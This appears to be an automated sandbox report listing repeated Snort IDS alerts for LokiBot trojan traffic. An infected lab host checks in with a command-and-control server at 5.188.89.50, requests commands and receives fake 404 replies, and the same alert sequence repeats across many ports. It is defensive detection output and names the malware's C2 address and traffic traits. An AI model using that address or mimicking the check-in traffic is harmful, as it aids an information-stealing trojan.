              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49196 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49196 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49196 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49196 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49196
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49197 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49197 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49197 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49197 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49197
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49198 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49198 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49198 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49198 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49198
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49199 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49199 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49199 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49199 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49199
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49200 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49200 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49200 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49200 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49200
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49201 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49201 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49201 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49201 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49201
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49202 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49202 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49202 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49202 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49202
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49203 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49203 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49203 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49203 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49203
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49204 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49204 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49204 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49204 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49204
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49205 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49205 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49205 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49205 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49205
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49206 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49206 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49206 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49206 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49206
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49207 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49207 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49207 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49207 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49207
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49208 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49208 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49208 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49208 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49208
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49209 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49209 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49209 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49209 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49209
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49210 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49210 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49210 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49210 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49210
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49211 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49211 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49211 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49211 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49211
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49212 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49212 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49212 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49212 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49212
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49213 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49213 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49213 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49213 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49213
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49214 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49214 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49214 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49214 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49214
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49215 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49215 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49215 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49215 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49215
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49216 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49216 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49216 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49216 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49216
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49217 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49217 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49217 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49217 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49217
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49218 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49218 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49218 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49218 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49218
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49219 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49219 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49219 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49219 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49219
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49220 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49220 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49220 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49220 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49220
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49221 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49221 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49221 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49221 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49221
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49222 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49222 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49222 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49222 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49222
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49223 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49223 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49223 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49223 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49223
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49224 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49224 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49224 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49224 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49224
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49225 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49225 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49225 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49225 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49225
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49226 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49226 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49226 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49226 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49226
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49227 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49227 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49227 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49227 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49227
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49228 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49228 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49228 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49228 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49228
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49229 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49229 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49229 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49229 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49229
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49230 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49230 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49230 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49230 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49230
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49231 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49231 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49231 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49231 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49231
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49232 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49232 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49232 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49232 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49232
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49233 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49233 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49233 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49233 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49233
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49234 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49234 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49234 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49234 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49234
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49235 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49235 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49235 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49235 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49235
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49236 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49236 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49236 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49236 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49236
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49237 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49237 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49237 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49237 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49237
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49238 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49238 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49238 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49238 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49238
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49239 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49239 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49239 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49239 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49239
